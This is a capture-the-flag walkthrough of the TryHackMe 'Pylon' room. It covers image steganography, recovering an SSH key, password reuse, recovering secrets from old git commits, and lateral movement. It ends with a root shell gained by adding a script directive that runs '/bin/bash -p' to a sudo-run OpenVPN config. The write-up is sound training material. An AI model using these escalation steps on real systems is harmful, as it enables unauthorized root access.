PyLon
Pylon is a medium-difficulty room authored by pood0g. The room looks to have the user find 4 flags, with the starting point analysing a data file using steganography. The room warns that password reuse is bad practice so its something to keep in mind as we navigate through the challenges.
Where appropriate, I shall be using the following conventions -
- $victim_ip to denote the IP of the victim machine (replace your victim’s IP in this place).
- #[REDACTED] to symbolize removal of room answers or to shorten typical output of comman execution / code.
Let’s get started!
Download and analyze the task files
Downloading the file reveals an image of a dog that is confirmed when we analyze its properties using the file command. Using exiftool, we are able to see that there is a URL in the Subject’s section that leads us to a customized set up of CyberChef.
A quick use of steghide to find information on the file reveals that there is possibly a hidden file within the image but requires a passphrase to use it. Using the filename as the password enables us to extract the hidden file lone. Analyzing the file looks base64 encoded.
A quick decode of the file produces a gzip compressed file which extracted produces a private key for the user. With this key, we can make our first assumption that it works for a user named lone given the name of the file.
# Check the file properties of the pepper file.
> file pepper.jpg
pepper.jpg: JPEG image data, baseline, precision 8, 2551x1913, components 3
> exiftool pepper.jpg
ExifTool Version Number : 12.39
File Name : pepper.jpg
Directory : .
File Size : 381 KiB
File Modification Date/Time : 2022:02:04 07:57:57-05:00
File Access Date/Time : 2022:02:08 22:39:35-05:00
File Inode Change Date/Time : 2022:02:04 07:59:17-05:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
XMP Toolkit : Image::ExifTool 12.16
Subject : https://gchq.github.io/CyberChef/#recipe=To_Hex('None',0)To_Base85('!-u',false)
Image Width : 2551
Image Height : 1913
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 2551x1913
Megapixels : 4.9
# Check for any hidden files
> steghide info pepper.jpg
"pepper.jpg":
format: jpeg
capacity: 20.6 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!
# Extract hidden file
> steghide extract -sf pepper.jpg
Enter passphrase:
wrote extracted data to "lone".
# Analyze extracted file
> head -n 10 lone
H4sIAAAAAAAAA+3Vya6zyBUA4H/NU9w9ilxMBha9KObZDMY2bCIGG2MmMw9P39c3idRZtJJNK4rE
J6FT0imkoupQp2zq+9/z9NdfCXyjafoTMZoCf4wfBEnQvzASAJKkAX7EfgEMo2jw6wv8pav6p7Ef
ou7r69e7aVKQ/fm8/5T/P/W3D06UVevrZIuW5ylftqte4Fn80sXgJ4vEBFfGtbVFPNaFt2JIXyL8
4GRqiiv/MxTjih1DB/4L93mk+TNMtwTPhqRGrOdPav5++TPRESFJ1ZenOJwJutdri7sq+CXob/EL
MhPUmTsglUeXSeBo5bLs9C5nDNqMBNpIE+gmnwBsxHPDGMFz4ai7SgmsvsWNPJ4FOMqhM/otyliH
J1c9oim/K4aSFa7FdUDstCNASlyCiXA9voVmfuQzj019mi/O0WCK6fJMiw3I/sOG5UN1n4oyOJFT
O/Rcu0Mqv1RbZw8eZto9omonQ8A9mrUWj56ycWZo8w2S2n0JURnxiSsC0fAnQ9CdNCyvcQQK6WAn
eVvUhRC0eBUXvJsixOt6w/1qAdfBxmf+yXLOoV+Xsybc6mPFi31jqYeuMfSVw0a56g9vKecWD7Rp
HkJ4OvLruVhl5BnOMcbplf/ZeebprXXL+v37ODl/PImfg+CgI7yq9Cp6mP0Y5zYBUvAIL/mSjogp
rAzsFvqcpegIb+cGV4OQX0RxBDWXVfT0oM2AdvjMPb3mIVdEpSRfhQ06a8wiyjR5Mix5CvE6eiZQ
# Decode and analyze file
> cat lone | base64 -d > lone_decoded
> file lone_decoded
lone_decoded: gzip compressed data, from Unix, original size modulo 2^32 10240
> mv lone_decoded lone_decoded.tgz
> tar zxvf lone_decoded.tgz
lone_id
Enumerate and exploit server’s open ports
We can perform an enumeration on the server to identify potentially open ports, with an interest for open SSH ports. The scan reveals two potential SSH ports - 22 and 222. Port 222 works with the key and we are presented with the pyLon server.
Requesting for an encryption key, we can make an educated guess based on the CyberChef link and the initial assumption of password reuse. Generating an encrypted password using pepper on CyberChef, we are able to access the pyLon service.
Selecting the first option to decrypt a password will enable us access the first flag as well as the password for the lone user that we can use to SSH into port 22.
rustscan -a $victim_ip -r 1-65535 -- -sC -sV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open $victim_ip:22
Open $victim_ip:222
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-08 23:20 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
#[REDACTED]
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
#[REDACTED]
222/tcp open ssh syn-ack OpenSSH 8.4 (protocol 2.0)
#[REDACTED]
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# Change permission of private key and SSH into server
> chmod 600 lone _id
> ssh -i lone_id -p 222 lone@$victim_ip
/
__ / __ __
/ ) / / / / ) / )
/___/ (___/ /____/ (___/ / /
/ /
/ (_ / pyLon Password Manager
by LeonM
[*] Encryption key exists in database.
Enter your encryption key: # Use the output from CyberChef as the encryption key.
[1] Decrypt a password.
[2] Create new password.
[3] Delete a password.
[4] Search passwords.
# Select 1 to access the passwords saved by the Password Manager
SITE USERNAME
[1] pylon.thm lone
[2] FLAG 1 FLAG 1
Password for FLAG 1
Username = FLAG 1
Password = #[REDACTED]
Password for pylon.thm
Username = lone
Password = #[REDACTED]
[1] Decrypt a password.
[2] Create new password.
[3] Delete a password.
[4] Search passwords.
Select an option [Q] to Quit: Q
[*] Quitting, are you sure?
(Y)es or (N)o: Y
[*] Database closed cleanly.
Connection to $victim_ip closed.
SSH with new password on port 22
With lone’s password discovered, we can SSH into the server on Port 22. Once we are in, we can find the user flag user1.txt in lone’s home directory.
We also notice that there’s another encrypted file note_from_pood.gpg which, when using the gpg tool, shows that it requires a password. Attempting to recycle all the passwords we have gathered so far doesn’t seem to help much.
However, we notice that within the pyLon directory is a .git folder implying that the pylon project has possibly been leveraging on source control and has version history. A quick git log within the pylon directory confirms this. It is likely that earlier versions of the application has sensitive information that we could exploit.
We can access an earlier commit by using the git checkout command with reference to the first commit. This reveals an older file titled pyLon_pwMan.py. Following the instructions in the README.txt, executing the script will bring us back to the familiar PyLon database. We can recycle the password we used during our SSH probe (Port 222) to gain access and get the password for the gpg password file.
NOTE: As part of my information gathering efforts, I religiously copied the files from lone’s the home directory and attempted to decrypt the gpg file. However, because I do not have the associated encryption keys, I struggled. I would encourage you to decrypt the file from lone’s account rather than doing it on your machine.
With this password, we can read the message in the encrypted gpg file, obtaining some additional credentials that will allow us to laterally move into a colleauge’s account - pood.
But before laterally moving into pood’s account, we can enumerate lone and notice that he has sudo permissions to execute the openvpn command but configured via an a ovpn script. lone lacks the rights to change this script but executing this command remains an interesting fact we should keep in our notes.
> ssh lone@$victim_ip
The authenticity of host '$victim_ip ($victim_ip)' can't be established.
ED25519 key fingerprint is SHA256:a4J2LwSwZl59RFhvrfKuRiFGA2RDy+i9GN/nNgd2b44.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:14: [hashed name]
~/.ssh/known_hosts:20: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '$victim_ip' (ED25519) to the list of known hosts.
lone@$victim_ip's password: # Enter password here
Welcome to
/
__ / __ __
/ ) / / / / ) / )
/___/ (___/ /____/ (___/ / /
/ /
/ (_ / by LeonM
lone@pylon:~$
> ls
note_from_pood.gpg pylon user1.txt
> cat user1.txt
#[REDACTED]
> cd pylon/ # Change into the pylon project folder
> git log # Read the git changes / commit log
commit 73ba9ed2eec34a1626940f57c9a3145f5bdfd452 (HEAD, master)
Author: lone <lone@pylon.thm>
Date: Sat Jan 30 02:55:46 2021 +0000
actual release! whoops
commit 64d8bbfd991127aa8884c15184356a1d7b0b4d1a
Author: lone <lone@pylon.thm>
Date: Sat Jan 30 02:54:00 2021 +0000
Release version!
commit cfc14d599b9b3cf24f909f66b5123ee0bbccc8da
Author: lone <lone@pylon.thm>
Date: Sat Jan 30 02:47:00 2021 +0000
Initial commit!
# Next command extracts the last commit reference (cfc14d599b9b3cf24f909f66b5123ee0bbccc8da)
> git checkout $(git log | grep commit | cut -d ' ' -f2 | tail -n 2)
Previous HEAD position was 73ba9ed actual release! whoops
HEAD is now at cfc14d5 Initial commit!
> git log # Confirm that git is on the commit of interest.
commit cfc14d599b9b3cf24f909f66b5123ee0bbccc8da (HEAD)
Author: lone <lone@pylon.thm>
Date: Sat Jan 30 02:47:00 2021 +0000
Initial commit!
> ls # pyLon_pwMan.py appears in the file listing
README.txt banner.b64 pyLon.db pyLon_crypt.py pyLon_db.py pyLon_pwMan.py
> python3 pyLon_pwMan.py
/
__ / __ __
/ ) / / / / ) / )
/___/ (___/ /____/ (___/ / /
/ /
/ (_ / pyLon Password Manager
by LeonM
[*] Encryption key exists in database.
Enter your encryption key: # Use password as used over SSH Port 222.
[*] Encryption key correct.
[*] Initialization complete.
[1] List passwords.
[2] Decrypt a password.
[3] Create new password.
[4] Delete a password.
[5] Search passwords.
[6] Display help menu.
Select an option [Q] to Quit: 2
SITE USERNAME
[1] pylon.thm_gpg_key lone_gpg_key
Select a password [C] to cancel: 1
Password for pylon.thm_gpg_key
Username = lone_gpg_key
Password = #[REDACTED]
# Quit application and return to command line.
> cd ~ # Return to home directory of user
> gpg -d note_from_pood.gpg
# Enter the new password in the Passphrase section.
┌────────────────────────────────────────────────────────────────┐
│ Please enter the passphrase to unlock the OpenPGP secret key: │
│ "lon E <lone@pylon.thm>" │
│ 3072-bit RSA key, ID D83FA5A7160FFE57, │
│ created 2021-01-27 (main key ID EA097FFFA0996DAA). │
│ │
│ │
│ Passphrase: ****************__________________________________ │
│ │
│ <OK> <Cancel> │
└────────────────────────────────────────────────────────────────┘
gpg: encrypted with 3072-bit RSA key, ID D83FA5A7160FFE57, created 2021-01-27
"lon E <lone@pylon.thm>"
Hi Lone,
Can you please fix the openvpn config?
It's not behaving itself again.
oh, by the way, my password is #[REDACTED]
Thanks again.
> sudo -l # Let's see what sudo commands he can execute
Password: # Enter lone's password
Matching Defaults entries for lone on pylon:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User lone may run the following commands on pylon:
(root) /usr/sbin/openvpn /opt/openvpn/client.ovpn
> ls -la /opt/openvpn/client.ovpn # lone has no rights to change the file.
-rw-rw---- 1 root root 8225 Feb 10 13:52 /opt/openvpn/client.ovpn
Laterally move into pood’s account
Now that we have pood’s password, we can laterally move into his/her account. Listing the home directory reveals the user2.txt and the contents can then be read to obtain the flag.
Enumerating the user, we can see he has sudo permissions to edit the client.ovpn file that lone can execute but cannot edit. We can use pood to make changes to the file to trigger the spawning of a bash shell whilst maintaining the sudo rights (root) for this shell.
With root privileges, we can navigate to the root folder and list its contents. Decrypt the gpg file for the root flag.
> su pood
Password: # Enter pood's password
pood@pylon:/home/lone$ cd # Enter pood's home directory
> ls
user2.txt
> cat user2.txt
#[REDACTED]
> sudo -l # Let's see pood's sudo rights
Matching Defaults entries for pood on pylon:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pood may run the following commands on pylon:
(root) sudoedit /opt/openvpn/client.ovpn
# Executing sudo command allows us to edit the client.ovpn file.
> sudoedit /opt/openvpn/client.ovpn # Make the changes and quit the editor.
client
dev tun
proto udp
remote 127.0.0.1 1194
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
cipher AES-256-CBC
script-security 2 # Add this line to enable us execute scripts
up "/bin/bash -p" # Add this line to enable spawning of the bash shell
<ca>
-----BEGIN CERTIFICATE-----
#[REDACTED]
> exit # Revert back to lone's account [use this if you performed an 'su']
> sudo /usr/sbin/openvpn /opt/openvpn/client.ovpn # Run the command and spawn the root shell.
root@pylon:/home/lone#
> cd /root
> ls
root.txt.gpg
> gpg -d root.txt.gpg
gpg: encrypted with 3072-bit RSA key, ID 91B77766BE20A385, created 2021-01-27
"I am g ROOT <root@pylon.thm>"
#[REDACTED]
And we are done!